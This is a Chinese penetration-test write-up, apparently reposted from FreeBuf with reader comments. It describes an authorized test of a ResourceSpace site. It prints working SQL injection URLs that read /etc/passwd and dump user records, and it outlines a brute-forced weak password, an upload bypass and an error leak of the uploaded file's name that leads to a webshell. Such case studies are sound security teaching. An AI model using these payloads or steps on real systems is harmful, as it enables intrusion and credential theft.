CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

web挖掘

2017年5月23日 842点热度 0人点赞 0条评论

web挖掘

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

一次通过漏洞挖掘成功渗透某网站的过程

椒图科技2014-04-08+14共613211人围观 ,发现 41 个不明物体WEB安全

起因

我们的一个客户希望我们对其网站进行渗透测试,以发现其脆弱点并协助改进安全性。在拿到对方渗透测试授权之后,我们开始了对其网站的分析。

寻找突破口

对方主站是一个定制开发的CMS,在进行一系列扫描和分析之后,未发现可利用的地方,于是开始分析其二级域名,发现其中某资源管理分站,目标操作系统linux,仅开放HTTP(80端口),整站程序为ResourceSpace,一个开源php建站程序。

漏洞挖掘

因为是开源程序,考虑其漏洞挖掘相对容易一些,于是决定把这个网站作为突破口。于是到resourcespace的官方网站(http://www.resourcespace.org/)下载最新版源代码,在本地本地搭建测试环境,开始白盒审计代码。这个resourcespace大部分功能都是要登陆后才能使用的,而我们目标网站不允许外部注册用户,所以我们要挖掘不需要登录验证就可利用的漏洞。

第一步要挖的是那些容易利用的漏洞,SQL注入之类的,经过一番grep,在pages/search_disk_usage.php里面发现一处调用:

$results=do_search(getval("search",""),getvalescaped("restypes",""),"relevance",getval("archive",""),-1,"desc",false,$starsearch,false,true);

再来看一下include/search_functions.php

if($sql_filter!="") {$sql_filter.=" and ";}   
$sql_filter.="archive='$archive'";             }
returnsql_query($sql_prefix . "select distinct *,r2.hit_count score from (select$select from resource r $sql_join  where$sql_filter order by ref desc limit $last ) r2 order by $order_by" .$sql_suffix,false,$fetchrows);

这里存在一个典型的SQL注入漏洞。我们在本地测试环境中访问以下URL来测试:

http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'

返回:

证明了注入点确实存在。不过这个超长的嵌套SQL注入要想利用起来还是有点麻烦的,想构造语句闭合几个语句试了半天没发现合适的方法。因为对方数据库是mysql所以准备利用rand&groupby报错大法来试一下。构造语句是这样的:

http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1

果然读到了passwd文件内容,这是利用mysql一个特有的bug来报错的手段,也是常用的SQL注入方法,对该方法原理不再赘述,感兴趣的请参考:http://bugs.mysql.com/bug.php?id=8652。

接下来要做是获取管理员密码,进后台传webshell,于是尝试了目标网站:

http://rs.XXXX.com/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20username%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1

返回:

密码破解

返回了加密后的密码,到这里成功的希望就已经相当大了。因为手工注入太麻烦,所以写了个程序来跑出目标网站所有的账号和密码。

admin-----b****d93ce187f01b7e7c96b0b1df062
Sp****erS-----a****437d2e18f2fe5bf623412427493
J****J-----9****aa12a24a73953d5ab95567cd5d1
n****nph-----6****7f9f3d7ea132ba42d349df99b01
d****e-----1****dd082b77c13ca1ecafd1a0d7ac4
N****iaA-----a****4dfd4c74c15d9e7ab2620639f21
D****ahT-----c****cb83afadf07dda15b8a7716068a
J****P-----d****001e3b5f26967007ab2647b8ae6
b****rtm-----9****6d20cd016ffb3bc9593bd3ed0f3
J****R-----a****4b643d1e69aa8d51f9c616e46c9
L****A-----b****7d728a7048add07b6404e6854ac
……

密码看起来像是MD5加密的,不过进一步查看源代码却发现形势不容乐观,加密是加用户名salt后MD5的:

md5($salt+$username+$pass)

这意味着无法在cmd5等网站查询,也无法使用彩虹表破解,而只能选择暴力破解:(但resourcespace的默认密码策略是要求密码必须同时使用字母和数字的,这样破解的希望就更小了,于是乎写了个破解程序:

挂上我们的NB字典开始跑密码,本来没抱太大希望,但是希望总是留给勇于尝试的人,还真有一个用户使用了弱口令。

虽然不是admin账号,但是成功登陆进去一样可以做很多事情,我们接下来的目标是:获取webshell进而获得系统权限。

文件上传

使用用户choib/qwer1234登录进目标网站,发现有个地方是可以上传图片的,而且通过字节截断可以上传php文件,但是存在一个很大的问题是,上传后的文件被重命名为随机文件名,我们无法找到上传后的webshell。渗透过程到这里再一次陷入僵局。

再回过头来看resourcespace程序代码,通过分析程序发现可通过提交不正常请求,使程序强制报错,爆出上传的文件名。

当点击下载图片时,并不会直接连接图片的URL地址,而是通过访问

/ResourceSpace/pages/download_progress.php?ref=24&ext=php&k=&alternative=1&search=%21last1000&offset=0&archive=0&sort=DESC&order_by=relevance

我们可以通过Burp修改HTTP请求,来让程序报错:

这样就找到了上传后的文件,并且在目标系统上获得了webshell:

后记

获得shell后,我们又做了大量的工作,例如提权获得root,内网渗透等等,但是因为涉及客户一些敏感信息,这里就不再具体介绍了。本文的主旨还是介绍通过挖掘并利用resourcespace漏洞来获得渗透的突破口。

最后,作为一家负责任的安全厂商,我们把此漏洞提交给了resourcespace官方,希望能够对提升开源软件的安全性做一些贡献。

椒图科技是一家国内专注于服务器安全的厂商,椒图攻防实验室是公司内专注于攻击渗透的部门,这里有最新的攻击技术研究氛围,欢迎有志于攻击、渗透、web漏洞挖掘的大牛小牛加入我们!有意请联系:job@jowto.com

椒图科技3 篇文章等级: 1级
|
|
  • 上一篇:由XSS漏洞引发的僵尸网络DDos攻击风暴
  • 下一篇:使用fuzzDB进行web安全测试

这些评论亮了

  • anlfi(5级)回复
    自从看习惯了BT般配置疯狗般的WAF抓狂般HIPS没有低于20位高强度密码和自定义对等算法hash
    然后还要面对无数linux集群堡垒的对撞 如同地狱般的煎熬心都碎了
    直到最后
    我看完这篇文章仿佛我的心灵都被治愈了
    就像狂风暴雨后充满阳光的黎明,微弱的阳光,温柔的风,而幼小的飞鸟能够展翅高飞
    爆米花+可乐360度跪求续集 真是太不可思议了
    ---------------
    比如黑盒都可以找到的注入点 假装用白盒来表示这里是我审计出来的
    暴路径 上传漏洞 一大堆错误信息泄露 都是可以被找到的
    以及利用一个加salt的hash 来写一个单线程的py跑一个你都想不到的弱密码 实在是太炫了 有没有
    ---省略标签请忽略下文------
    你们做渗透培训的吗? 这些技术不做培训太可惜了呀 我建议还是去做一做
    5w/20天收入一个人 10个人就是50w 比和厂商做报告可赚多了
    )64(亮了
发表评论

已有 41 条评论

  • 阿布 (3级)qq:2920151665 2014-04-08回复1楼

    nice :mrgreen:

    亮了(1)
  • init5 (3级)招商银行安全员 2014-04-08回复2楼

    果然是专业,是一个牛完成一系列的流程么?

    亮了(3)
  • 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-04-08回复3楼

    想知道提权如何做,求科普

    亮了(1)
  • Madmaner 2014-04-08回复4楼

    nice :mrgreen:

    亮了(1)
  • m3 2014-04-08回复5楼

    我有种预感:该站完全可以通过mysql into outfile拿shell

    亮了(4)
    • yyyy3333 2014-04-08回复

      @m3 。。。有道理的样子 …… 对了 你妈叫你回家吃饭。。。。我出来玩的时候刚碰到她

      亮了(2)
    • 椒图科技 (1级)椒图科技是一家国内专注于服务器安全的厂商,椒图攻防实验室是公... 2014-04-08回复

      @m3 当时就试过啦,mysql非root也没有file_priv权限

      亮了(0)
    • 11 2014-04-08回复

      @m3 绝对路径没有呢

      亮了(1)
    • 河蟹 2014-04-13回复

      @m3 真心没看到过linux能用mysql导出shell

      亮了(1)
  • 呵呵 2014-04-08回复6楼

    不错不错。。
    看着很爽。。
    不知道实际用了多么久多久。。

    亮了(1)
  • LittleHann (5级)阿里巴巴安全工程师 2014-04-08回复7楼

    "通过分析程序发现可通过提交不正常请求,使程序强制报错,爆出上传的文件名"
    这个很亮,LZ能详细说说吗?

    亮了(5)
    • global_hacker (4级) 2014-04-08回复

      @LittleHann 呵呵 同求 亮点

      亮了(0)
    • 蛋蛋 2014-04-08回复

      @LittleHann  同样求亮点

      亮了(0)
    • 椒图科技 (1级)椒图科技是一家国内专注于服务器安全的厂商,椒图攻防实验室是公... 2014-04-08回复

      @LittleHann  其实就是用BURP访问显示图片的这个URL:/ResourceSpace/pages/download_progress.php?ref=24&ext=php&k=&alternative=1&search=%21last1000&offset=0&archive=0&sort=DESC&order_by=relevance的时候把ext=php改成一个不存在的ext=xxx,这样就报错把上传的文件名显示出来了

      亮了(2)
  • cabbage_che (1级)我是矗立在远处的一颗白菜,默默的关注着你们。。。 2014-04-08回复8楼

    之前都没听说过resourcespace 粗糙了。。。

    亮了(1)
  • 神^-^~~~ (1级) 2014-04-08回复9楼

    能说明一下,这次渗透用时多久,多少个大牛完成的吗? 感觉好长期的研究啊!

    亮了(0)
    • 椒图科技 (1级)椒图科技是一家国内专注于服务器安全的厂商,椒图攻防实验室是公... 2014-04-08回复

      @神^-^~~~  前期找突破口没费多长时间,后期内网渗透耗费的时间长

      亮了(0)
  • 心在想念 (2级) 2014-04-08回复10楼

    公司的技术实力应该很强,大牛很多
    很想加入..

    亮了(2)
    • 椒图科技 (1级)椒图科技是一家国内专注于服务器安全的厂商,椒图攻防实验室是公... 2014-04-08回复

      @心在想念  欢迎发简历到job@jowto.com

      亮了(0)
      • 心在想念 (2级) 2014-04-08回复

        @椒图科技  简历已发到mail,希望可以加入你们..:)

        亮了(2)
  • MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-04-08回复11楼

    来来来,NB字典求共享 QAQ

    亮了(0)
  • anlfi (5级) 2014-04-08回复12楼

    自从看习惯了BT般配置疯狗般的WAF抓狂般HIPS没有低于20位高强度密码和自定义对等算法hash
    然后还要面对无数linux集群堡垒的对撞 如同地狱般的煎熬心都碎了
    直到最后
    我看完这篇文章仿佛我的心灵都被治愈了
    就像狂风暴雨后充满阳光的黎明,微弱的阳光,温柔的风,而幼小的飞鸟能够展翅高飞

    爆米花+可乐360度跪求续集 真是太不可思议了
    —————
    比如黑盒都可以找到的注入点 假装用白盒来表示这里是我审计出来的

    暴路径 上传漏洞 一大堆错误信息泄露 都是可以被找到的

    以及利用一个加salt的hash 来写一个单线程的py跑一个你都想不到的弱密码 实在是太炫了 有没有

    —省略标签请忽略下文——
    你们做渗透培训的吗? 这些技术不做培训太可惜了呀 我建议还是去做一做
    5w/20天收入一个人 10个人就是50w 比和厂商做报告可赚多了

    亮了(64)
    • 阿布 (3级)qq:2920151665 2014-04-08回复

      @anlfi  你又亮了…

      亮了(0)
    • qinghe 2014-04-08回复

      @anlfi  学长\(^o^)/

      亮了(1)
  • Hicks_Rookie 2014-04-08回复13楼

    典型的旁站攻击

    亮了(0)
  • XuYuanzhen 2014-04-08回复14楼

    思路不错

    亮了(0)
  • ovens (3级) 2014-04-08回复15楼

    工作地点在哪里?

    亮了(0)
    • snail (1级) 2014-04-09回复

      @ovens  工作地点北京

      亮了(0)
  • 网络安全与防骗 2014-04-08回复16楼

    厉害!

    亮了(0)
  • 你在哪-我看不见 2014-04-08回复17楼

    牛逼~

    亮了(0)
  • softbug (7级)011101000110100001100001011011... 2014-04-08回复18楼

    我举得可以这样防御:
    1. 关闭php的自动报错提示,类似关闭IIS的报错信息一样
    2. …..
    3. …..

    额,是不是可以来个waf就防御了呢?

    亮了(3)
  • 铂金小猪 2014-04-08回复19楼

    牛逼啊。

    亮了(0)
  • 羽-赤炎之瞳 2014-04-08回复20楼

    论PHP代码审计的重要性+那狗血的运气弱口令

    亮了(1)
  • 小城 2014-04-08回复21楼

    之前都没听说过resourcespace 粗糙了。。。

    亮了(0)
  • dr4gon 2014-04-08回复22楼

    [din推撞]

    亮了(0)
  • 清风 (1级) 2014-04-09回复23楼

    楼主发贴辛劳了,感激楼主分享!

    亮了(0)
  • lusiyu (1级) 2014-04-27回复24楼

    mark

    亮了(0)
  • xx-berry (1级) 2014-05-20回复25楼

    之前都没听说过resourcespace 粗糙了。。。

    亮了(0)
  • diamond (1级) 2014-08-01回复26楼

    学习中,哇哈哈!

    亮了(0)
  • wyk (1级)初一学生一枚。。大神带我装逼带我飞。 2015-04-16回复27楼

    初一学生一枚。。漏洞盒子48rank。想参与参与。

    亮了(1)
  • hehe 2016-09-01回复28楼

    三十一岁了,对渗透满腔热情,但是还是个二楞青,请问有加入的可能性吗?

    亮了(2)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

椒图科技

椒图科技是一家国内专注于服务器安全的厂商,椒图攻防实验室是公司内专注于攻击渗透的部门

3 篇文章7 条评论

相关阅读

  • 这两天黑客都做了什么?老司机带你飞过GeekPwn
  • 360安全卫士被关闭漏洞分析
  • 关于渗透的一些资料分享
  • SQL Injection的深入探讨
  • 13个有用的渗透测试资源博客

特别推荐

关注我们 分享每日精选文章

不容错过

  • 我与学校SafeConnect软件斗智斗勇的经历zasdfgbnm2017-02-06
  • 测一测才知道,百度安全软件是不是真流氓?dedogger2014-12-29
  • 360成功入侵特斯拉汽车,获特斯拉官方回复phper2014-07-19
  • 技术揭秘“QQ空间”自动转发不良信息渔村安全2015-08-22

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me